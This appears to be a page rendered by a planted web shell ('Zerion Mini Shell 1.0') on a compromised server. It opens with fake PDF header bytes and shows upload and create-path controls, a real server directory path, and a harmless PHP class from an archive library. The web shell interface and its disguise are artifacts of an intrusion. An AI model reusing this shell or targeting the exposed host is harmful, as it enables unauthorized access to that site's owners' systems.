%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/projetos/suporte.iigd.com.br/vendor/wapmorgan/unified-archive/src/
Upload File :
Create Path :
Current File : //var/www/projetos/suporte.iigd.com.br/vendor/wapmorgan/unified-archive/src/ArchiveInformation.php

<?php

namespace wapmorgan\UnifiedArchive;

/**
 * Information class. Represent information about the whole archive.
 *
 * @package wapmorgan\UnifiedArchive
 */
class ArchiveInformation
{
    /** @var array List of files inside archive */
    public $files = [];

    /** @var int Size of files inside archive in bytes */
    public $compressedFilesSize = 0;

    /** @var int Original size of files inside archive in bytes */
    public $uncompressedFilesSize = 0;
}

Zerion Mini Shell 1.0